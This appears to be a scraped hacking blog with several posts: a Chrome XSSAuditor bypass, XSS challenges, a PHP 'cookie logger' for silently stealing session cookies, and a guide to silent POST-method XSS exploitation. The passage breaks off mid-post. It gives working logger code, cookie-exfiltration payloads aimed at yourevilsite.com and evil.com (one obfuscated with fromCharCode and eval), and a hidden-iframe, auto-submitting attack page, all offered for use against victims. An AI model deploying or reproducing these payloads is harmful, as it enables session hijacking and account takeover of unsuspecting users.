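        print(label, scan_swf(blob))
```

Pair this with serving user-uploaded SWFs only with allowScriptAccess set to never, as the intro notes, since a string scan is a heuristic and not a proof of safety.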
<div class="post_body" id="pid_35379975">
<span style="color: #3d85c6;"><b>~r0ng</b></span></div>
<b>Weaknesses in google Chrome XSSAuditor - a bypass found!</b> (published 2013-09-16)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bybjwbIri2g/UPkSWM0K-3I/AAAAAAAABgs/yqNzamnhs_U/s400/Screen+Shot+2013-01-18+at+3.40.22+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://3.bp.blogspot.com/-bybjwbIri2g/UPkSWM0K-3I/AAAAAAAABgs/yqNzamnhs_U/s640/Screen+Shot+2013-01-18+at+3.40.22+PM.png" width="640" /></a></div>
<br />
<br />
<a name='more'></a><br />
<br />
<br />
The Chrome XSSAuditor is open source. I noticed that the auditor is weaker in certain branches of markup than in others, such as in the <head>. Filtering by element is handled slightly differently depending on where the injection appears within the major sections of the markup. Extract:<br />
<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;">ASSERT(request.shouldAllowCDATA || !m_scriptTagNestingLevel);<br />
m_scriptTagNestingLevel++;<br />
} else if (hasName(request.token, objectTag))<br />
didBlockScript |= filterObjectToken(request);<br />
else if (hasName(request.token, paramTag))<br />
didBlockScript |= filterParamToken(request);<br />
else if (hasName(request.token, embedTag))<br />
didBlockScript |= filterEmbedToken(request);<br />
else if (hasName(request.token, appletTag))<br />
didBlockScript |= filterAppletToken(request);<br />
else if (hasName(request.token, iframeTag))<br />
didBlockScript |= filterIframeToken(request);</span></code></div>
</div>
</div>
<br />
I found two tags for which XSSAuditor can be bypassed if we can close the <body> tag with our injection.<br />
<br />
Before I got a reply from the Chrome team, I found a deeper flaw in the timing of these checks: if malformed markup inside the <head> is auto-corrected or mutated by the browser, the check is done too late relative to that mutation, so what XSSAuditor inspects is not what ends up resolved in the document.<br />
<br />
<img alt="[Image: B2d9b1a.png]" border="0" src="http://i.imgur.com/B2d9b1a.png" />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-75103159468960933462013-09-16T06:45:00.003-07:002013-12-21T14:41:15.842-08:00 r0ng's XSS Challenges - Challenge 2<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/xHVoeb7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="http://i.imgur.com/xHVoeb7.png" width="400" /></a></div>
Try to solve these challenges and send me your solutions via the comments (moderated); if you are correct I will add you to the solvers list :).<br />
<br />
<br />
<a name='more'></a><b>Objective: </b>Alert your name with JavaScript!<br />
<br />
Link: <a href="http://dfu123.comule.com/xsschallenge2.php">http://dfu123.comule.com/xsschallenge2.php</a><br />
<br />
<u><b>Solvers:</b></u><br />
1. M.R.S.CO From Iranian Dark Coders Team<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-25596339206162824192013-09-16T06:44:00.001-07:002013-09-17T07:50:14.056-07:00r0ng's XSS Challenges - Challenge 1<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ZEZU0pT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://i.imgur.com/ZEZU0pT.png" width="400" /></a></div>
<br />
Try to solve these challenges and send me your solutions via the comments (moderated); if you are correct I will add you to the solvers list :).<br />
<br />
<br />
<a name='more'></a> <br />
<b>Objective: </b>Alert your name with JavaScript!<br />
<br />
Link: <a href="http://dfu123.comule.com/xsschallenge1.php">http://dfu123.comule.com/xsschallenge1.php</a><br />
<br />
<u><b>Solvers:</b></u><br />
<br />
1. Codah<br />
2. HeliosGR
<br />
<br />
<br />
<br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-80108100348707155402013-08-11T16:54:00.003-07:002013-11-02T13:58:33.875-07:00r0ng's cookie logger script - for silently stealing website cookies<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/uQPOB7Y.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="http://i.imgur.com/uQPOB7Y.png" width="640" /></a></div>
For when you want to steal someone's session cookies but you don't want to raise the alarm!<br />
<br />
<br />
<a name='more'></a><br /><br />
<span style="font-weight: bold;"><span style="color: dodgerblue;">What/why?</span></span><br />
<br />
Stealing cookies isn't complicated, but sometimes it can be tricky depending on what is filtered from your JS injection. It can be made much harder if your aim is to steal them silently, without the person knowing. Keep in mind that document.cookie only exposes cookies set without the HttpOnly flag, so a session cookie marked HttpOnly cannot be read this way at all.<br />
<br />
<span style="font-weight: bold;"><span style="color: dodgerblue;">The script</span></span><br />
<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<u><b>PHP Code:</b></u></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #7ac07c;"><?php<br />
// r0ng's cookie logger: each hit with ?cookie=... appends one row (flag, country, IP,<br />
// User-Agent, cookies, referer) to cookie.txt; ?pass=... shows the log as a table.<br />
<br />
$file = 'cookie.txt';<br />
<br />
// Create the cookie file on first run<br />
if (!file_exists($file)) {<br />
    file_put_contents($file, "<h1>r0ng's cookie logger</h1>");<br />
}<br />
<br />
// Check for the password and display the cookie file to the admin<br />
if (isset($_GET['pass']) && $_GET['pass'] === "r0ng") {<br />
    while (!is_readable($file)) {<br />
        usleep(10000); // Wait for file permissions<br />
    }<br />
    die("<table><tr><th>FLAG</th><th>LOCATION</th><th>IP-ADDRESS</th><th>HTTP_USER_AGENT</th><th>COOKIES</th><th>HTTP_REFERER</th></tr>"<br />
        . file_get_contents($file) . "</table>");<br />
}<br />
<br />
// Derive the victim's IP. X-Forwarded-For is a client-supplied header, so it can be<br />
// forged; REMOTE_ADDR is the only value the web server actually vouches for.<br />
$ipAddress = $_SERVER['REMOTE_ADDR'];<br />
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {<br />
    // end() needs a variable: array_pop(explode(...)) raises a "passed by reference" notice<br />
    $forwarded = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);<br />
    $ipAddress = trim(end($forwarded)); // last hop; the first entry would be the originating client<br />
}<br />
<br />
// cURL helper for the geo API call<br />
function get_content($URL) {<br />
    $ch = curl_init();<br />
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br />
    curl_setopt($ch, CURLOPT_URL, $URL);<br />
    curl_setopt($ch, CURLOPT_TIMEOUT, 5); // don't hang the victim's request if the API is down<br />
    $data = curl_exec($ch);<br />
    curl_close($ch);<br />
    return $data;<br />
}<br />
<br />
// Build the victim's table row. Everything is HTML-escaped, otherwise a victim (or a<br />
// defender who spots the logger) could XSS the admin page through a cookie or User-Agent.<br />
$countryCode = strtolower(htmlspecialchars((string) get_content('http://api.wipmania.com/' . $ipAddress)));<br />
$userAgent   = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';<br />
$cookie      = isset($_GET['cookie']) ? $_GET['cookie'] : '';<br />
$referer     = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';<br />
<br />
$data = "<tr><td><img src='http://www.geonames.org/flags/x/" . $countryCode . ".gif' width='100'></td>"<br />
      . "<td>" . $countryCode . "</td>"<br />
      . "<td>" . htmlspecialchars($ipAddress) . "</td>"<br />
      . "<td>" . htmlspecialchars($userAgent) . "</td>"<br />
      . "<td>" . htmlspecialchars($cookie) . "</td>"<br />
      . "<td>" . htmlspecialchars($referer) . "</td></tr>\n";<br />
<br />
while (!is_writable($file)) {<br />
    usleep(10000); // Wait for file permissions<br />
}<br />
<br />
// Append the row to the file; LOCK_EX keeps two simultaneous victims from interleaving<br />
file_put_contents($file, $data, FILE_APPEND | LOCK_EX);<br />
?></span></code></span>
</div>
</div>
<br />
<span style="font-weight: bold;"><span style="color: dodgerblue;">Tutorial</span></span><br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">a.) Setting it up:</span></span><br />
Upload that script to your webhost as logger.php (and change the password in the script before you deploy it).<br />
You access the admin panel with /logger.php?pass=r0ng<br />
Note that the script writes cookie.txt next to itself, inside the webroot, so the raw log is also fetchable directly as /cookie.txt with no password at all; if that matters, write the log outside the document root or deny access to it in the server configuration.<br />
<br />
<span style="text-decoration: underline;"><span style="font-weight: bold;">b.) JS injections:</span></span><br />
<br />
For most of the injections, we are taking advantage of the inherent stealthiness of XMLHttpRequest: nothing changes in the page the victim is looking at. The same-origin policy only stops the injected script from reading the response from our evil site; a plain cross-origin GET is still sent, and we don't need the response. The only trace is a CORS error in the browser's developer console.<br />
<br />
<span style="font-weight: bold;">1.) Quotes allowed:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">>var </span><span style="color: #66ccff;">a </span><span style="color: #7ac07c;">= new </span><span style="color: #66ccff;">XMLHttpRequest</span><span style="color: #7ac07c;">(); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">open</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"get"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"http://yourevilsite.com/logger.php?cookie=" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">send</span><span style="color: #7ac07c;">();</span><span style="color: #66ccff;"></script></span> </span></code></div>
</div>
</div>
<br />
<span style="font-weight: bold;">2.) Apostrophe allowed:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">>var </span><span style="color: #66ccff;">a </span><span style="color: #7ac07c;">= new </span><span style="color: #66ccff;">XMLHttpRequest</span><span style="color: #7ac07c;">(); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">open</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'get'</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">'http://yourevilsite.com/logger.php?cookie=' </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">send</span><span style="color: #7ac07c;">();</span><span style="color: #66ccff;"></script></span> </span></code></div>
</div>
</div>
<br />
<span style="font-weight: bold;">3.) Quotes/apostrophe not allowed:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">>eval(</span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">118</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">114</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">61</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">119</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">88</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">77</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">76</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">72</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">82</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span 
style="color: #66ccff;">113</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">115</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">40</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">41</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">59</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">40</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">103</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">44</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">104</span><span style="color: #7ac07c;">, </span><span style="color: 
#66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">58</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">47</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">47</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">100</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">102</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">49</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">50</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">51</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">109</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">108</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">109</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">47</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">108</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span 
style="color: #7ac07c;">, </span><span style="color: #66ccff;">103</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">103</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">114</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">104</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">112</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">63</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">107</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">105</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">61</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">39</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">43</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">100</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">117</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">109</span><span style="color: #7ac07c;">, 
</span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">116</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">99</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">111</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">107</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">105</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">41</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">59</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">97</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">46</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">115</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">101</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">110</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">100</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">40</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">41</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">59</span><span style="color: #7ac07c;">));</span><span style="color: #66ccff;"></script></span> </code></span></div>
</div>
</div>
<span style="font-weight: bold;">Note 1:</span> Converting the above charcode array back to string would give: <br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #7ac07c;">var </span><span style="color: #66ccff;">a </span><span style="color: #7ac07c;">= new </span><span style="color: #66ccff;">XMLHttpRequest</span><span style="color: #7ac07c;">(); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">open</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'get'</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">'http://yourevilsite.com/logger.php?cookie=' </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">a</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">send</span><span style="color: #7ac07c;">(); </span></code></span></div>
</div>
</div>
Here is a newbie friendly site to create charcodes: <a href="http://jdstiles.com/java/cct.html" target="_blank">http://jdstiles.com/java/cct.html</a><br />
<br />
<span style="font-weight: bold;">4.) Quotes/apostrophe not allowed but can reference external script:</span><br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">SCRIPT SRC</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">http</span><span style="color: #7ac07c;">:</span></span><span style="color: #ffcccc;"><span style="background-color: black;">//yourevilsite.com/evil.js></SCRIPT> </span></span></code></div>
</div>
</div>
<br />
<span style="font-weight: bold;">Note 2:</span> Any of the other injections would be placed inside the evil.js file (without the script tags).<br />
<br />
<span style="font-weight: bold;">5.) Not enough space:</span><br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">window</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">replace</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"//yourevilsite.com/logger.php?cookie=" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span><span style="color: #7ac07c;">)</span><span style="color: #66ccff;"></script></span> </code></span></div>
</div>
</div>
<span style="font-weight: bold;">Note 3:</span> All of these are silent other than number 5. If you need to use that one, you can add a meta-refresh redirect back to the referring page (easily googleable if you don't know how).<br />
<br />
<h4>
(If you find this useful, why not check out an advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span></h4>
Exploiting POST Method XSS Silently (posted 2013-07-06, updated 2013-10-23)<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/O6WvDUj.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://i.imgur.com/O6WvDUj.jpg" width="320" /></a></div>
POST HTTP method XSS exploitation without the target filling out a form... SILENTLY<br />
<br />
<h4>
What's POST method XSS?</h4>
<br />
A cross-site scripting vulnerability that is exploited by sending the input from a form to the vulnerable website via POST HTTP method (so it could be a search box on a site that uses POST not GET).<br />
<br />
<h4>
How does exploitation differ from GET method XSS?</h4>
<br />
When a GET request is made, the request is sent over HTTP in the form: website.com/search.php?keyword=whatever.<br />
<br />
When a POST request is made, the request is sent over HTTP in the form:<br />
website.com/search.php<br />
<br />
(the content, e.g. keyword=whatever, is sent in the body of the HTTP request rather than as part of the URL).<br />
<br />
With that in mind, the typical reflected XSS attack can't be sent to the target like normal:<br />
<br />
<i> website.com/search.php?keyword="><script>evil-javascript</script></i><br />
<br />
With the POST method, the user actually has to fill out a form on your evil-site and usually click "submit", which lets evil-site send the user along with the POST request to the target website. The body of that POST request carries the javascript payload, which then ends up running. <br />
<br />
<h4>
How do we exploit it?</h4>
Note: this works on Firefox, and will also work on Chrome provided the injected vector renders within script tags.<br />
<br />
Of course asking the user to fill out a form on a strange site is a bit fishy. But using javascript we can submit the form automatically without the user's interaction upon them landing on the page. Moreover, we can do it in the background using a hidden iframe on your evil-site so you can display whatever other content you like whilst they are getting pwnd. If the site doesn't like iframes, we have an alternative method.<br />
<br />
Forget about cross-site request forgery defenses messing this up: if we can run javascript on the target, we can always bypass CSRF restrictions. After testing a site and finding code vulnerable to XSS (via POST variables), our aim will be to reference an external javascript file which will contain our extended evil payload.<br />
<br />
<br />
<code><span style="background-color: black;"><span style="color: #ff99ff;"> <SCRIPT SRC='http://myevilsite.com/evil.js'></SCRIPT></span></span></code><br />
<br />
<br />
<br />
<h4>
The exploit code:</h4>
<br />
Upload the following 5 files to a hosting website substituting evil.com with your own webhosting site URL (explanations beneath), and you may also have to change the payload to bypass any security filters that may be in place:<br />
<br />
<br />
<u><b> .htaccess</b></u><br />
<br />
<span style="background-color: black;"></span><code><span style="background-color: black;"><span style="color: #66ccff;">AddType application</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">x</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">httpd</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">php </span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">html</span></span><span style="color: #66ccff;"><br /></span></code><br />
<u><b><br /></b></u>
<u><b>attackpage.html</b></u><br />
<br />
<code><span style="background-color: black;"><span style="color: #7ac07c;"><code><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">H1</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">Innocent page is innocent</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">H1</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">Your bases are not belong to me</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">dun worry bro</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">><br /><? if (isset(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"done"</span><span style="color: #7ac07c;">])) {<br />die();<br />}</span><span style="color: #66ccff;">?></span><iframe src="http://evil.com/background.php" width="1" height="1" frameborder="0"></iframe><br /></body><br /></html> </code></span></span><span style="color: #7ac07c;"><span style="background-color: black;"></span></span></code><br />
<br />
<u><b>background.php</b></u><br />
<br />
<code><span style="color: #7ac07c;"></span><span style="background-color: black;"><span style="color: #66ccff;"><html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br />.</span><span style="color: #66ccff;">xss </span><span style="color: #7ac07c;">{</span><span style="color: #66ccff;">display</span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">none</span><span style="color: #7ac07c;">;<br />}<br /></</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br /></</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /><br /><</span><span style="color: #66ccff;">body onload</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"XSS.submit();"</span><span style="color: #7ac07c;">><br /><br /><</span><span style="color: #66ccff;">form id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"xss" </span><span style="color: #66ccff;">action</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"http://www.attackesite.com/search or whatever the sub-folder is/" </span><span style="color: #66ccff;">method</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"post" </span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"XSS"</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">input name</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"target" </span><span style="color: #66ccff;">value </span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"all"</span><span style="color: #7ac07c;">></</span><span style="color: #66ccff;">input</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">input 
name</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"address" </span><span style="color: #66ccff;">value</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"<SCRIPT SRC='http://evil.com/evil.js'></SCRIPT>"</span><span style="color: #7ac07c;">></</span><span style="color: #66ccff;">input</span><span style="color: #7ac07c;">><br /><br /></</span><span style="color: #66ccff;">form</span><span style="color: #7ac07c;">><br /></</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">><br /><br /></</span><span style="color: #66ccff;">html</span></span><span style="color: #7ac07c;"><span style="background-color: black;">> </span></span></code><br />
<br />
<b>Note:</b> You may need to use tinyurl.com to shorten the evil url.<br />
<br />
<u><b>evil.js</b></u><br />
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">window</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">replace</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"http://evil.com/cookie.php?cookie=" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">encodeURIComponent(document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">cookie</span></span><span style="color: #7ac07c;"><span style="background-color: black;">)); </span></span></code><br />
<br />
<u><b>cookie.php</b></u><br />
<br />
<div class="body">
<div dir="ltr">
